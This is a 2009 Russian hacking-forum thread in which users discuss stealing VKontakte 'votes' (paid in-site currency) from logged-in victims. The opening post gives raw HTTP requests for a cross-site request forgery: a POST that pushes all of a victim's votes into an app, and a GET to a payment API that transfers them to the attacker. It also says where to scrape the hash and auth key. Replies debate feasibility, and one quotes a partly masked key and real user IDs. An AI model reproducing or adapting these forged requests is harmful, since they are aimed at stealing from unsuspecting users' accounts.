ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Тырим голоса вконтакта? О_о
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Тырим голоса вконтакта? О_о
  #1  
Старый 30.08.2009, 00:49
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию Тырим голоса вконтакта? О_о
Навеяно вот этой темой
https://forum.antichat.ru/threadnav138188-1-10.html
Тама ajax получает у вконтакта ID и запрашивает всю остальную инфу
Так вот например приложение передачи голосов
http://vkontakte.ru/app577176
Чтоб положить в него голоса, вот такой пакет нужен
приложение ненадо устанавливать на страницу или разрешать действия, не 1к голосов слил через него, проверено
Код:
POST http://vkontakte.ru/apps.php?act=a_settings HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: vkontakte.ru
Referer: http://vkontakte.ru/app577176
Cookie: куки
Proxy-Connection: Keep-Alive
Content-Length: 84
Content-Transfer-Encoding: binary

app_id=577176&app_hash=hash&cn=0&caf=0&caph=0&caa=0&add=99999999&withdraw=0
Верхняя часть пакета вместе с куками автоматически получается, т.к. жертва залогинена на вконтакте (vir2total получает имено так инфу)

Потом сам контент
app_id - ID приложения, всё понятно
app_hash - хэш (если пасмареть HTML код паги, его можно увидеть)
Код:
...
var app_invited_text = 'Приглашения Вашим друзьям в это приложение успешно высланы.';
var app_invited1_text = 'Приглашение успешно выслано.';
var app_hash = 'hash';
var invite_used = 0;
....
Я так понимаю через ajax можно "выпилить" этот хэш
И add это кол-во голосов, указываем 99999 и он пополняет приложение на все голоса что есть на акке
=========
Для передачи голосов такой пакет
Код:
GET http://misc.roboxchange.com/External/VKontakte/API.ashx?APImethod=transferVotes&authKey=ключ&fromId=ID жертвы&Id=ваш id HTTP/1.0
Host: misc.roboxchange.com
Referer: http://cs252.vkontakte.ru/u9352882/961f3908269ce8.zip
Proxy-Connection: Keep-Alive
authKey - ключ, он также есть в HTML
so.addVariable("auth_key", "ключ");
=========
Собстна вооот... Надеюсь все меня поняли? И ИМХО эта система будет работать, просто я в ajax'e не рублю а очень спать хочется, отпишитесь кто попробовал, катит, не катит

шаман говорит что там инфа через флэшку выводится а не через ajax в общем я хз, ну я своё ИМХО выложил, теперь пру спать
Последний раз редактировалось Ponchik; 30.08.2009 в 01:08..
 
Ответить с цитированием

  #2  
Старый 30.08.2009, 15:23
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
Какбэ кроссдоменные запросы JS не поддержиает -> страницу не отпарсить и хеш с аускеем не получить.
 
Ответить с цитированием

  #3  
Старый 30.08.2009, 15:38
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Профиксили, чтоли?
Отправил
Код:
GET http://misc.roboxchange.com/External/VKontakte/API.ashx?APImethod=transferVotes&authKey=d77*****ab819438b2c3********91f&fromId=9352882&Id=34595285 HTTP/1.0
Host: misc.roboxchange.com
Referer: http://cs252.vkontakte.ru/u9352882/961f3908269ce8.zip
Proxy-Connection: Keep-Alive
инеткреком, получил "Жулик!!!!".
 
Ответить с цитированием

  #4  
Старый 30.08.2009, 16:43
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
МБ неверный authKey =\
Я вот попробовал, всё норм
А вот какраз указал неверный authKey говорит жулек
Последний раз редактировалось Ponchik; 30.08.2009 в 16:46..
 
Ответить с цитированием

  #5  
Старый 30.08.2009, 20:23
Аватар для zavra
zavra
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928

Репутация: 137
Отправить сообщение для zavra с помощью ICQ
По умолчанию
и как ты получишь хэш со страницы? для каждого id он разный, и вытянуть его через флеш нельзя, ибо стоит allowscriptaccess = false.
нет, никак. только если разгадать алгоритм генерации этого самого хэша.
 
Ответить с цитированием

  #6  
Старый 30.08.2009, 20:24
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Блин, а я свой хэш указывал =\
 
Ответить с цитированием

  #7  
Старый 30.08.2009, 21:16
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
zavra, ну через ajax, ведь vir2total так и получал данные ИМХО, но ещё раз говорю шаман сказал это было приложение в фрейме, но сайт в ддосе такчто я незнаю
 
Ответить с цитированием

  #8  
Старый 30.08.2009, 21:34
Аватар для zavra
zavra
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928

Репутация: 137
Отправить сообщение для zavra с помощью ICQ
По умолчанию
приложение во фрейме = флешка? если да, то знаю как это сделано, но это ололо какой жестокий приват =)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Sell] Голоса вконтакте (VKontakte) (и рейтинг в контакте) по самым низким ценам! dinar_007 Покупка, продажа, услуги в Соц. Сетях 226 31.05.2010 13:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ